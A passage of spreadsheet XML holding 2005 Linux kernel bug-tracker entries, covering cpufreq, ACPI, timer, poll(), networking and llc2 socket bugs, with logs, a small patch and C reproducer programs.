    <t>Distribution:Kanotix Hardware Environment:AMD64 dual-core 3800+ Software Environment:32-bit debian sid Problem Description:powernowd would run on only one core at a time..after a long uptime errors showed in messages . enought to not use it past git4 or so Steps to reproduce:build cpufreq into kernel; run powernowd as daemon using modules~ freq_table, powernow_k8 errors: powernow-k8: error - out of sync, fix 0x2 0xc, vid 0x12 0xa, for hundreds of lines with rc7 powernowd doesnt start at all the same kernel-source and config work fine on 64-bit</t>
  </si>
  <si>
    <t>blk_queue_make_request updates 'max_hw_segments' and 'max_phys_segments' directly.</t>
  </si>
  <si>
    <t>2005-08-24 08:14 UTC</t>
  </si>
  <si>
    <t>Stuart McLaren</t>
  </si>
  <si>
    <t>2005-10-06 13:53 UTC</t>
  </si>
  <si>
    <t>Build broken (in mach-es7000) without CONFIG_ACPI</t>
  </si>
  <si>
    <t>2005-08-24 10:02 UTC</t>
  </si>
  <si>
    <t>Richard Perrin</t>
  </si>
  <si>
    <t>2006-04-11 00:41 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Did not occur on 2.6.11.11, no others tested Problem Description: Kernel will not build with "CONFIG_X86_GENERICARCH=y" and "CONFIG_ACPI not set". Output from make: [...] CC arch/i386/mach-generic/../mach-es7000/es7000plat.o In file included from arch/i386/mach-es7000/es7000plat.c:42: arch/i386/mach-es7000/es7000.h:82: error: field `id' has incomplete type arch/i386/mach-es7000/es7000.h:88: error: field `Header' has incomplete type arch/i386/mach-es7000/es7000plat.c: In function `parse_unisys_oem': arch/i386/mach-es7000/es7000plat.c:154: error: `es7000_rename_gsi' undeclared (first use in this function) arch/i386/mach-es7000/es7000plat.c:154: error: (Each undeclared identifier is reported only once arch/i386/mach-es7000/es7000plat.c:154: error: for each function it appears in.) arch/i386/mach-es7000/es7000plat.c: In function `find_unisys_acpi_oem_table': arch/i386/mach-es7000/es7000plat.c:168: warning: implicit declaration of function `acpi_find_rsdp' arch/i386/mach-es7000/es7000plat.c:170: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:172: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:175: warning: implicit declaration of function `__acpi_map_table' arch/i386/mach-es7000/es7000plat.c:175: error: invalid application of `sizeof' to an incomplete type arch/i386/mach-es7000/es7000plat.c:179: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:179: error: invalid application of `sizeof' to an incomplete type arch/i386/mach-es7000/es7000plat.c:181: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:185: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:188: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:194: error: invalid application of `sizeof' to an incomplete type arch/i386/mach-es7000/es7000plat.c:197: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:198: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:201: warning: implicit declaration of function `acpi_table_print' arch/i386/mach-es7000/es7000plat.c:202: error: dereferencing pointer to incomplete type arch/i386/mach-es7000/es7000plat.c:204: error: dereferencing pointer to incomplete type make[2]: *** [arch/i386/mach-generic/../mach-es7000/es7000plat.o] Error 1 make[1]: *** [arch/i386/mach-generic/../mach-es7000] Error 2 make: *** [arch/i386/mach-generic] Error 2 Changing the config to include CONFIG_ACPI=y will cause build of this file to succeed. Full build has not been attempted. Steps to reproduce: 1) cp attached config file to kernel-top-level/.config 2) make</t>
  </si>
  <si>
    <t>a potential bug in function "acpi_rs_address64_stream"??</t>
  </si>
  <si>
    <t>2005-08-24 13:54 UTC</t>
  </si>
  <si>
    <t>2005-09-09 09:19 UTC</t>
  </si>
  <si>
    <t>Problem Description: In line 1153 of the file "resources/rsaddr.c", should "range_attribute" be replaced with "translation_attribute" as in functions "acpi_rs_address16_stream" and "acpi_rs_address32_stream"?</t>
  </si>
  <si>
    <t>2.6.14</t>
  </si>
  <si>
    <t>Lost ticks compensation fires when it should not</t>
  </si>
  <si>
    <t>2005-08-24 17:12 UTC</t>
  </si>
  <si>
    <t>Tim Mann</t>
  </si>
  <si>
    <t>2011-03-07 20:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.4 Distribution: Hardware Environment: Software Environment: Problem Description: [Note: I reported this bug on the high-res-timers-discourse mailing list and the kernel mailing list back in November. The folks who are working on major changes to timer code took it seriously, but it's not fixed in Linus's kernel yet and those major changes don't seem close to being all finished yet, so I'm filing the bug here -- mostly for reference, partly in hopes that it may get fixed incrementally in the current timer code. I've checked, and the buggy code is still in 2.6.12.5. Below is a revised version of my post from November.] In 2.6, some code has been added to watch for "lost ticks" and increment jiffies_64 to compensate for them. A "lost tick" is when timer interrupts are masked for so long that ticks pile up and the kernel doesn't see each one individually, so it loses count. Lost ticks are a real problem, especially in 2.6 with the base interrupt rate having been increased to 1000 Hz, and it's good that the kernel tries to correct for them. However, detecting when a tick has truly been lost is tricky. The code that has been added (both in timer_tsc.c's mark_offset_tsc and timer_pm.c's mark_offset_pmtmr) is overly simplistic and can get false positives. Each time this happens, a spurious extra tick gets added in, causing the kernel's clock to go faster than real time. The lost ticks code in timer_pm.c essentially works as follows. Whenever we handle a timer tick interrupt, we note the current time as measured on a finer-grained clock (namely the PM timer). Let delta = current_tick_pm_time - last_tick_pm_time. If delta &gt;= 2.0 ticks, then we assume that the last floor(delta) - 1 ticks were lost and add this amount into the jiffies counter. The timer_tsc.c code is more complex but shares the same basic concept. What's wrong with this? The problem is that when we get around to reading the PM timer or TSC in the timer interrupt handler, there may already be *another* timer interrupt pending. There is a small amount of queuing in x86 interrupt controllers (PIC or APIC), to handle the case where a device needs to request another interrupt in the window between when its previous interrupt request has been passed on from the controller to the CPU and when the OS's interrupt handler has run to completion and unmasked the interrupt. When this case happens, the CPU gets interrupted again as soon as the interrupt is unmasked. The queue length here is very short, but it's not 0. When using the APIC, I think there can be one interrupt that the CPU has acknowledged and is currently processing with interrupts masked, a second interrupt currently pending in the APIC's ISR, and a third interrupt currently being requested in the APIC's IRR, making the queue length 2. This queuing means that we are being slow about responding to timer interrupts (due to having interrupts masked for too long, say), then when we finally get into the interrupt handler for timer interrupt number T, interrupt number T+1 (and possibly T+2 as well) may already be queued. If we handled interrupt T-1 on time, then at this point delta will be a little more than 2.0 ticks, because it's now past time for tick T+1 to happen, so the "lost ticks" code will fire and add an extra tick. But no ticks were really lost. We are handling tick T right now, and as soon as we return from the interrupt service routine and unmask the clock interrupt, we will immediately get another clock interrupt, the one for tick T+1, and we'll increment jiffies_64 for this tick too. So, checking whether delta &gt;= 2.0 will give us false positives. How to fix this? Because of the queuing, I believe there's no way to detect lost ticks without either false positives or negatives just by looking at the spacing between the current tick and the last tick. One idea is to do this test over a longer period, not just the last inter-tick period. If the TSC or PM timer tells us that we should have seen 10 ticks and we've seen only 7, we can be reasonably sure we've lost at least 1 tick. It's important not to make the period too long, though. Since we only know approximately how fast the TSC is, if we've seen 999,997 ticks when the TSC tells us we should have seen 1,000,000, that error may be due only to our idea of the TSC's rate being off by a few parts per million. (And actually, the measurement that Linux does of the TSC rate at bootup time isn't that accurate.) Another idea that may help is if we've recently added a "lost" tick and the next tick appears to be early, conclude that this is the tick we thought we'd lost showing up after all, and don't add it. For more ideas, see the discussion on http://lists.sourceforge.net/lists/listinfo/high-res-timers-discourse in November 2004. The thread subject is: Spurious "lost ticks". I should say that so far I haven't tried to test how much of an effect this bug has on real hardware, but it certainly can happen on any system where the lost ticks code is needed at all. It has a big effect in VMware VMs. I've seen time in 2.6 kernels run as much as 10% fast using the code in timer_tsc.c (kernel command line option clock=tsc), and I've seen a gain of roughly 1 second per hour with clock=pmtmr. (I understand why VM's would tickle the bug a lot more than real hardware does, and unfortunately it's not something I can do enough about within the VM implementation. Until it's fixed on the Linux side, all I can do is tell people to use timer=pit when they run 2.6 in a VM, which turns off all lost ticks compensation.)</t>
  </si>
  <si>
    <t>remove P-state verification after a P-state write in normal path</t>
  </si>
  <si>
    <t>2005-08-25 15:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: acpi-cpufreq driver does a P-state get after a P-state set, in order to verify whether set went through successfully. This test is kind of redundant as set goes throught most of the times, and the test is also expensive as a get of P- states can take a lot of time (same as a set operation) as it goes through SMM mode. Effectively, we are doubling the P-state latency due to this get opertion. The attached patch removes that check unless explicitly asked by acpi_pstate_strict parameter.</t>
  </si>
  <si>
    <t>poll(2) system call does not handle large timeout values correctly.</t>
  </si>
  <si>
    <t>2005-08-26 07:19 UTC</t>
  </si>
  <si>
    <t>Franz G. Fischer</t>
  </si>
  <si>
    <t>2006-05-22 02:44 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 9.3 Hardware Environment: i386 Software Environment: according to ver_linux: If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux silberakazie 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686 i686 i386 GNU/Linux Gnu C 3.3.5 Gnu make 3.80 binutils 2.15.94.0.2.2 util-linux 2.12q mount 2.12q module-init-tools 3.2-pre1 e2fsprogs 1.36 jfsutils 1.1.7 reiserfsprogs 3.6.18 reiser4progs line xfsprogs 2.6.25 Linux C Library 19 18:45 /lib/tls/libc.so.6 Dynamic linker (ldd) 2.3.4 Linux C++ Library 5.0.7 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.3.0 udev 053 Modules Loaded eeprom i2c_sensor i2c_dev af_packet ipt_state iptable_nat ip_conntrack iptable_filter ip_tables subfs nvram ipv6 speedstep_lib usbserial freq_table thermal processor fan button battery ac snd_pcm_oss snd_mixer_oss vmnet vmmon evdev joydev sg st sr_mod edd i2c_piix4 i2c_core uhci_hcd usbcore intel_agp agpgart 3c59x mii video1394 ohci1394 raw1394 ieee1394 capability parport_pc lp parport snd_es18xx snd_pcm snd_page_alloc snd_opl3_lib snd_timer snd_hwdep snd_mpu401_uart snd_rawmidi snd_seq_device snd soundcore dm_mod ide_cd cdrom ide_disk piix ide_core aic7xxx sd_mod scsi_mod Problem Description: The poll system call converts the timeout parameter from milliseconds to internal (HZ based) clock ticks. The conditional contstruct to avoid the signed long overflow assigns a too large maximum value in case of potential overflow: if (timeout) { /* Careful about overflow in the intermediate values */ if ((unsigned long) timeout &lt; MAX_SCHEDULE_TIMEOUT / HZ) timeout = (unsigned long)(timeout*HZ+999)/1000+1; else /* Negative or overflow */ timeout = MAX_SCHEDULE_TIMEOUT; } For timeout values &lt; (MAX_SCHEDULE_TIMEOUT / HZ) (no overflow) the conversion is correct and poll handles the timeout as expected. For values above this limit, the timeout is set to MAX_SCHEDULE_TIMEOUT (defined to LONG_MAX, i.e. 2147483647 on 32bit machines) instead of (MAX_SCHEDULE_TIMEOUT / HZ). As a consequence, with HZ being 1000 (on an i386 platform) timeouts longer than approximately 35 minutes and 47 seconds are ``rounded up'' to 24 days, 20 hrs, 31 min, 23 seconds. (We did not wait for this timeout to complete...) Steps to reproduce: Run the following program... #include &lt;stdlib.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/poll.h&gt; int main(int argc, char **argv) { time_t stime = time(NULL); time_t etime; int timeout = (argc == 2)? atoi(argv[1]): 2200*1000; struct pollfd ufds; memset(&amp;ufds, 0, sizeof(ufds)); (void) poll(&amp;ufds, 0, timeout); etime = time(NULL); printf("etime - stime = %d\n", etime - stime); return 0; } With one numeric argument less than 2147483 the program exits correctly after that number of milliseconds, with no argument or one above that limit it takes ``somewhat'' longer :-) Patch: --- ./fs/select.c 2005-03-02 08:37:42.000000000 +0100 +++ /tmp/select.c 2005-08-26 16:00:51.000000000 +0200 @@ -470,7 +470,7 @@ if ((unsigned long) timeout &lt; MAX_SCHEDULE_TIMEOUT / HZ) timeout = (unsigned long)(timeout*HZ+999)/1000+1; else /* Negative or overflow */ - timeout = MAX_SCHEDULE_TIMEOUT; + timeout = MAX_SCHEDULE_TIMEOUT / HZ; } poll_initwait(&amp;table);</t>
  </si>
  <si>
    <t>Ondemand governor makes system unstable</t>
  </si>
  <si>
    <t>2005-08-26 12:50 UTC</t>
  </si>
  <si>
    <t>Juha Heljoranta</t>
  </si>
  <si>
    <t>2007-04-29 07:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: x86_64 Software Environment: Problem Description: When using ondemand governor the kernel will freeze, reboot or most of the processes just become unstable after some time of usage. Steps to reproduce: start to use ondemand governor: echo ondemand &gt;/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor After some hours, say 1 - 4 h, the system becomes unstable when used normally (surf net, read mail, etc.) Symptoms: System might reboot itself without warning, kill X, make some process to behave oddly before the process dies, etc. Normally there is no warnings, errors or what so ever. After enabling a kernel debug I got few backtraces. If I do not use the ondemand governor then the system works just fine (uptime +30 days). I haven't changed my kernel configuration for some time so it was quite easy to spot what caused system to freek out. I recall that I've seen the same symptoms when using some 2.6.9 - 2.6.10 (Gentoo) kernels with ondemand governor. Back then I just decided to stick with the default (performance) governor.</t>
  </si>
  <si>
    <t>Boot hang - Asus K8N-DL</t>
  </si>
  <si>
    <t>2.6.14rc1</t>
  </si>
  <si>
    <t>2005-08-26 14:12 UTC</t>
  </si>
  <si>
    <t>2007-03-07 23:11 UTC</t>
  </si>
  <si>
    <t>(also tried with acpi-20050729-2.6.13-rc6.diff.bz2 from kernel.org) Asus K8N-DL hangs at boot. I did some instrumentation and the acpi_device_list gets a node that points to itself, which causes an hang later when the list is walked. Still debugging, but Len asked for an acpidmp</t>
  </si>
  <si>
    <t>r8169 - network dies.</t>
  </si>
  <si>
    <t>2005-08-27 06:52 UTC</t>
  </si>
  <si>
    <t>Fredrik</t>
  </si>
  <si>
    <t>2007-07-11 14:18 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution:crux Hardware Environment: amd-duron, via kt333, D-Link DGE-528T (r8169) Software Environment: file-server running samba 3.20 Problem Description: i found a pretty much identical description of this problem on the kernel mailinglist, for another card, e1000, found here: http://www.ussg.iu.edu/hypermail/linux/kernel/0401.2/1925.html i just got the card (D-Link DGE-528T) yesterday but the solution in the thread does not seem to work for me. Steps to reproduce: shuffle a shitload of data to and from the fileserver and watch the network fail.</t>
  </si>
  <si>
    <t>ext3 memory leaks (size-64 objects)</t>
  </si>
  <si>
    <t>2005-08-28 14:03 UTC</t>
  </si>
  <si>
    <t>Cedric Delfosse</t>
  </si>
  <si>
    <t>2005-11-19 04:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian GNU/Linux Hardware Environment: Toshiba laptop Software Environment: Linux Problem Description: I found that my system swap a lot after one day of use. Looks like the kernel is not freeing the memory it allocates. I join to this bug /proc/meminfo, /proc/slabinfo, and an output of the slabtop command. I already had this problem with older kernel, but I can't tell you precisely which version. Steps to reproduce: Boot Linux, and make lot of filesystem activities (ls -lR /, debootstrap). My fs is ext3. Then, slab memory in /proc/meminfo never stop to grow.</t>
  </si>
  <si>
    <t>Christoph Burger-Scheidlin</t>
  </si>
  <si>
    <t>Aironet 352 PCMCIA can't be activated</t>
  </si>
  <si>
    <t>2005-08-29 14:24 UTC</t>
  </si>
  <si>
    <t>Florian Sievers</t>
  </si>
  <si>
    <t>2005-08-30 17:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12.5 Distribution: Debian Sarge Hardware Environment: P3 500MHz/128MB PentiumBoard Cisco Aironet 352 Problem Description: I can't get the Cisco Aironet card working with this kernel. I compiled it once as a modul and after that didn's work I compiled it dirctly into the kernel. Both didn't work anymore. The ACTIVITY LED is on without pause and the STATUS LED isn't blinking. PCMCIA modules are compield in and also testet as module. It works well with kernel 2.6.12.5 and I also got it working with 2.6.13-rc6. Any suggestions?! Steps to reproduce: Activate PCMCIA (Yenta) and 16bit-pcmcia (didn't need this in the old kernel) and than say 'y' or 'm' to airo_cs (pc-card version)</t>
  </si>
  <si>
    <t>Driver Mouse - Toshiba touchpad after kernel 2.6.11</t>
  </si>
  <si>
    <t>2005-08-29 18:32 UTC</t>
  </si>
  <si>
    <t>Patrick</t>
  </si>
  <si>
    <t>2005-12-21 14:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.11 Distribution: Debian 3.1 Hardware Environment: Toshiba satellite 2410 Software Environment: KDE Problem Description: Since the kernel 2.6.12, i have a problem with my touchpad. In Kde, the menus disappear. In thunderbird, if i go to my last message and that i use my touchpad, it returns at the beginning. But when i put these lines in comments, all is correct. But not the scroll. (Option "ZAxisMapping" "4 5") Section "InputDevice" Identifier "Configured Mouse" Driver "mouse" Option "CorePointer" Option "Device" "/dev/psaux" Option "Protocol" "ImPS/2" #Option "ZAxisMapping" "4 5" EndSection Section "InputDevice" Identifier "Generic Mouse" Driver "mouse" Option "SendCoreEvents" "true" Option "Device" "/dev/input/mice" Option "Protocol" "ImPS/2" #Option "ZAxisMapping" "4 5" EndSection In 2.6.11, it's ok. Thanks, Patrick</t>
  </si>
  <si>
    <t>Danny ter Haar</t>
  </si>
  <si>
    <t>llc2: llc_ui_bind() leaves llc-&gt;dev NULL</t>
  </si>
  <si>
    <t>2005-08-30 07:24 UTC</t>
  </si>
  <si>
    <t>2006-02-05 10:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: - Distribution: Debian Hardware Environment: Alpha / Intel Problem Description: binding LLC stream sockets to a local address leaves llc-&gt;dev = NULL. A later connect() causes Oops in llc_establish_connection(). Steps to reproduce: #undef __GLIBC__ #include &lt;linux/socket.h&gt; #include &lt;asm/socket.h&gt; #include &lt;linux/if_ether.h&gt; #include &lt;linux/if_arp.h&gt; #include &lt;linux/if_packet.h&gt; #include &lt;linux/llc.h&gt; #define __GLIBC__ #define SOCK_DGRAM 2 #define SOCK_STREAM 1 static void get_hwaddr (unsigned char *name, unsigned char *addr, short int *type) { struct ifreq ifr; int fd = socket (AF_INET, SOCK_DGRAM, 0); if (fd &lt; 0) { printf ("socket failed\n"); return; } bcopy (name, &amp;ifr.ifr_name, sizeof (ifr.ifr_name)); /* find my own hardware address */ if (ioctl (fd, SIOCGIFHWADDR, &amp;ifr) &lt; 0) { close (fd); printf ("ioctl(SIOCGIFHWADDR) failed\n"); return; } close (fd); bcopy (&amp;ifr.ifr_hwaddr.sa_data, addr, ETH_ALEN); *type = ifr.ifr_hwaddr.sa_family; } int llc_open (unsigned char sap, char *name) { struct sockaddr_llc sllc; short int type; int fd; unsigned char smac[ETH_ALEN]; fd = socket (PF_LLC, SOCK_STREAM, 0); if (fd &lt; 0) { printf ("socket failed\n"); return -1; } get_hwaddr (name, smac, &amp;type); bzero (&amp;sllc, sizeof (sllc)); sllc.sllc_family = AF_LLC; sllc.sllc_arphrd = type; sllc.sllc_sap = 0xc2; bcopy (smac, &amp;sllc.sllc_mac, ETH_ALEN); if (bind (fd, &amp;sllc, sizeof (sllc)) &lt; 0) { close (fd); printf ("bind failed\n"); return -1; } bzero (&amp;sllc, sizeof (sllc)); sllc.sllc_family = AF_LLC; sllc.sllc_arphrd = type; sllc.sllc_sap = 232; sllc.sllc_mac[0] = 0x10; sllc.sllc_mac[1] = 0x00; sllc.sllc_mac[2] = 0x90; sllc.sllc_mac[3] = 0x9a; sllc.sllc_mac[4] = 0x30; sllc.sllc_mac[5] = 0x9c; if (connect (fd, &amp;sllc, sizeof (sllc)) &lt; 0) { close (fd); printf ("connect failed\n"); return -1; } return fd; } int main() { char name[] = "eth0"; int fd; fd = llc_open(232,name); }</t>
  </si>
  <si>
    <t>llc2: llc_ui_connect() sends packet to wrong destination</t>
  </si>
  <si>
    <t>2005-08-30 07:34 UTC</t>
  </si>
  <si>
    <t>2006-02-06 05:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: - Distribution: Debian Hardware Environment: Alpha / Intel Problem Description: With #5156 fixed locally, the test program tries to connect, but the packets on the wire have destination MAC address and DSAP of all zero: No. Time Source Destination Protocol Info 19 4.277708 Ibm_6b:c6:95 00:00:00_00:00:00 LLC U P, func=SABME; DSAP NULL LSAP Individual, SSAP 0xc2 Command Frame 19 (17 bytes on wire, 17 bytes captured) Arrival Time: Aug 30, 2005 16:05:49.145221000 Time delta from previous packet: 0.204868000 seconds Time since reference or first frame: 4.277708000 seconds Frame Number: 19 Packet Length: 17 bytes Capture Length: 17 bytes Protocols in frame: eth:llc IEEE 802.3 Ethernet Destination: 00:00:00_00:00:00 (00:00:00:00:00:00) Source: Ibm_6b:c6:95 (00:02:55:6b:c6:95) Length: 3 Logical-Link Control DSAP: NULL LSAP (0x00) IG Bit: Individual SSAP: Unknown (0xc2) CR Bit: Command Control field: U P, func=SABME (0x7F) ...1 .... = Poll: Set 011. 11.. = Command: Set Asynchronous Balanced Mode Extended (0x1b) .... ..11 = Frame type: Unnumbered frame (0x03) Steps to reproduce: #undef __GLIBC__ #include &lt;linux/socket.h&gt; #include &lt;asm/socket.h&gt; #include &lt;linux/if_ether.h&gt; #include &lt;linux/if_arp.h&gt; #include &lt;linux/if_packet.h&gt; #include &lt;linux/llc.h&gt; #define __GLIBC__ #define SOCK_DGRAM 2 #define SOCK_STREAM 1 static void get_hwaddr (unsigned char *name, unsigned char *addr, short int *type) { struct ifreq ifr; int fd = socket (AF_INET, SOCK_DGRAM, 0); if (fd &lt; 0) { printf ("socket failed\n"); return; } bcopy (name, &amp;ifr.ifr_name, sizeof (ifr.ifr_name)); /* find my own hardware address */ if (ioctl (fd, SIOCGIFHWADDR, &amp;ifr) &lt; 0) { close (fd); printf ("ioctl(SIOCGIFHWADDR) failed\n"); return; } close (fd); bcopy (&amp;ifr.ifr_hwaddr.sa_data, addr, ETH_ALEN); *type = ifr.ifr_hwaddr.sa_family; } int llc_open (unsigned char sap, char *name) { struct sockaddr_llc sllc; short int type; int fd; unsigned char smac[ETH_ALEN]; fd = socket (PF_LLC, SOCK_STREAM, 0); if (fd &lt; 0) { printf ("socket failed\n"); return -1; } get_hwaddr (name, smac, &amp;type); bzero (&amp;sllc, sizeof (sllc)); sllc.sllc_family = AF_LLC; sllc.sllc_arphrd = type; sllc.sllc_sap = 0xc2; bcopy (smac, &amp;sllc.sllc_mac, ETH_ALEN); if (bind (fd, &amp;sllc, sizeof (sllc)) &lt; 0) { close (fd); printf ("bind failed\n"); return -1; } bzero (&amp;sllc, sizeof (sllc)); sllc.sllc_family = AF_LLC; sllc.sllc_arphrd = type; sllc.sllc_sap = 232; sllc.sllc_mac[0] = 0x10; sllc.sllc_mac[1] = 0x00; sllc.sllc_mac[2] = 0x90; sllc.sllc_mac[3] = 0x9a; sllc.sllc_mac[4] = 0x30; sllc.sllc_mac[5] = 0x9c; if (connect (fd, &amp;sllc, sizeof (sllc)) &lt; 0) { close (fd); printf ("connect failed\n"); return -1; } return fd; } int main() { char name[] = "eth0"; int fd; fd = llc_open(232,name); }</t>
  </si>
  <si>
    <t>BUG: soft lockup detected on CPU#0!</t>
  </si>
  <si>
    <t>2005-08-30 12:46 UTC</t>
  </si>
  <si>
    <t>2007-05-17 15:05 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unsure Distribution:SLES 9 Hardware Environment:xseries - x305 Software Environment:SLES 9 w/ Linux version 2.6.13-rc6-mm1 Problem Description: After running tests for a couple of days I got this: BUG: soft lockup detected on CPU#0! Pid: 3545, comm: md0_raid1 EIP: 0060:[&lt;c027ddb3&gt;] CPU: 0 EIP is at ide_intr+0xc3/0x100 EFLAGS: 00000246 Not tainted (2.6.13-rc6-mm1) EAX: 00000001 EBX: dfc1a980 ECX: 06b3b555 EDX: 00000007 ESI: c0455b88 EDI: 00000246 EBP: c0455af8 DS: 007b ES: 007b CR0: 8005003b CR2: b79850d8 CR3: 04b58000 CR4: 000006d0 [&lt;c0282550&gt;] task_out_intr+0x0/0xd0 [&lt;c013a492&gt;] handle_IRQ_event+0x32/0x70 [&lt;c013a525&gt;] __do_IRQ+0x55/0xa0 [&lt;c0105128&gt;] do_IRQ+0x38/0x60 [&lt;c0103c5a&gt;] common_interrupt+0x1a/0x20 [&lt;c0147730&gt;] __blk_queue_bounce+0x210/0x280 [&lt;c02562fd&gt;] __make_request+0x5d/0x4a0 [&lt;c0256a4e&gt;] generic_make_request+0x12e/0x200 [&lt;c012d2d0&gt;] autoremove_wake_function+0x0/0x30 [&lt;c013a55c&gt;] __do_IRQ+0x8c/0xa0 [&lt;c013a543&gt;] __do_IRQ+0x73/0xa0 [&lt;c012d2d0&gt;] autoremove_wake_function+0x0/0x30 [&lt;c0103c5a&gt;] common_interrupt+0x1a/0x20 [&lt;f883cba3&gt;] raid1d+0x103/0x230 [raid1] [&lt;c0316552&gt;] schedule_timeout+0x92/0xa0 [&lt;c028f8cc&gt;] md_thread+0x11c/0x160 [&lt;c012d2d0&gt;] autoremove_wake_function+0x0/0x30 [&lt;c0102bd6&gt;] ret_from_fork+0x6/0x20 [&lt;c012d2d0&gt;] autoremove_wake_function+0x0/0x30 [&lt;c028f7b0&gt;] md_thread+0x0/0x160 [&lt;c0101319&gt;] kernel_thread_helper+0x5/0xc Steps to reproduce: The tests that I ran were iozone from the STP testsuite and fsstress from the LTP testsuite. I ran them concurrently on the same filesystem - /testfs. Filesystem Type 1K-blocks Used Available Use% Mounted on /dev/hda7 reiserfs 21229172 3031088 18198084 15% / tmpfs tmpfs 647900 8 647892 1% /dev/shm /dev/mapper/system-resultslv xfs 20961280 120680 20840600 1% /results /dev/md0 ext2 11361308 8 10784172 1% /testfs /dev/mapper/system-testfs2 ext3 11594976 5219340 5786632 48% /testfs2 /dev/hda5 jfs 11509344 1540 11507804 1% /testfs3 /dev/mapper/system-testfs4lv reiserfs 8388348 32840 8355508 1% /testfs4 /dev/hda2 reiserfs 3148632 248640 2899992 8% /tests /dev/hda6 ext2 1035660 180 982872 1% /tests/bash-memory This is a software RAID device. If this bug belongs in a different area, please let me know where it belongs.</t>
  </si>
  <si>
    <t>ACPI fails to load - No result objects! - 20050729 broken -- 20050408  OK - Acer Aspire T630: Unable to load the System Description Tables</t>
  </si>
  <si>
    <t>2.6.12 or 2.6.13 with acpi patch 20050729</t>
  </si>
  <si>
    <t>2005-08-31 10:14 UTC</t>
  </si>
  <si>
    <t>Hubert Verstraete</t>
  </si>
  <si>
    <t>2005-09-12 08:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12-1.1447_FC4smp (which is a 2.6.12 with acpi patch 20050729) Distribution: Fedora Core 4 Hardware Environment: Acer Aspire T630 Software Environment: gcc-4.0.1-4.fc4 Problem Description: The previous kernel 2.6.12-1.1398_FC4smp worked with ACPI loaded. It has the acpi patch 20050309. I tried to recompile the kernel with the acpi patch 20050408 and it worked too. But now with the last acpi patch, I've got a failure while initializing ACPI. Consequence ACPI is disabled, and some other problems occur, like sata_uli modules which hangs; more info here: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=165103 I recompiled with ACPI debug; here's a bit of the output of dmesg: BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000001fff0000 (usable) BIOS-e820: 000000001fff0000 - 000000001fff3000 (ACPI NVS) BIOS-e820: 000000001fff3000 - 0000000020000000 (ACPI data) BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) .... ACPI: RSDP (v000 AWARD ) @ 0x000f7110 ACPI: RSDT (v001 AWARD AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x1fff3040 ACPI: FADT (v001 AWARD AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x1fff30c0 ACPI: MCFG (v001 AWARD AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x1fff7280 ACPI: MADT (v001 AWARD AWRDACPI 0x42302e31 AWRD 0x01010101) @ 0x1fff71c0 ACPI: DSDT (v001 AWARD AWRDACPI 0x00001000 MSFT 0x0100000c) @ 0x00000000 ACPI: PM-Timer IO Port: 0x1008 Allocating PCI resources starting at 20000000 (gap: 20000000:c0000000) Built 1 zonelists .... CPU: Intel(R) Pentium(R) 4 CPU 3.20GHz stepping 01 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. tbxface-0109 [02] load_tables : ACPI Tables successfully acquired dswstate-0233 [13] ds_result_pop_from_bot: No result objects! State=dfeb0828 dsutils-0641 [13] ds_create_operand : Missing or null operand, AE_AML_NO_RETURN_VALUE dsutils-0734 [12] ds_create_operands : While creating Arg 1 - AE_AML_NO_RETURN_VALUE tbxface-0115: *** Error: acpi_load_tables: Could not load namespace: AE_AML_NO_RETURN_VALUE tbxface-0123: *** Error: acpi_load_tables: Could not load tables: AE_AML_NO_RETURN_VALUE ACPI: Unable to load the System Description Tables checking if image is initramfs... it is Freeing initrd memory: 1195k freed NET: Registered protocol family 16 PCI: PCI BIOS revision 3.00 entry at 0xfaf50, last bus=2 PCI: Using MMCONFIG ACPI: Subsystem revision 20050729 ACPI: Interpreter disabled. Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI: disabled</t>
  </si>
  <si>
    <t>smp c-states on Pentium 4 with hyperthreading causes big slow-down</t>
  </si>
  <si>
    <t>2005-08-31 16:15 UTC</t>
  </si>
  <si>
    <t>Karl Tomlinson</t>
  </si>
  <si>
    <t>2006-02-02 14:34 UTC</t>
  </si>
  <si>
